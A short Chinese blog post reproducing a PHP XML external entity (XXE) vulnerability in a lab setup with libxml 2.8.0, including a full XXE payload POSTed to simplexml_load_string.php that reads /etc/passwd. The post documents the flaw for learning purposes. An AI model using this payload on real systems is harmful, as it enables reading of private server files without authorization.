PHP外部实体注入漏洞复现

libxml2.9.0以后,默认不解析外部实体,导致XXE漏洞逐渐消亡。

环境介绍

php7.0.30

libxml 2.8.0

图片[1]-PHP外部实体注入漏洞复现-吾爱博客

靶机ip:http://192.168.50.134:8080/

漏洞复现

WWW目录下有4个文件,dom.phpSimpleXMLElement.phpsimplexml_load_string.php均可触发XXE漏洞

图片[2]-PHP外部实体注入漏洞复现-吾爱博客
图片[3]-PHP外部实体注入漏洞复现-吾爱博客

Payload

POST /simplexml_load_string.php

<?xml version="1.0" encoding="utf-8"?> 
<!DOCTYPE xxe [
<!ELEMENT name ANY >
<!ENTITY xxe SYSTEM "file:///etc/passwd" >]>
<root>
<name>&xxe;</name>
</root>
图片[4]-PHP外部实体注入漏洞复现-吾爱博客
温馨提示: 本文最后更新于2022-05-30,至今已有920天,某些文章具有时效性,若有错误或已失效,请在下方留言
© 版权声明
THE END
喜欢就支持一下吧❀
点赞0投币 分享
评论 抢沙发

    请登录后查看评论内容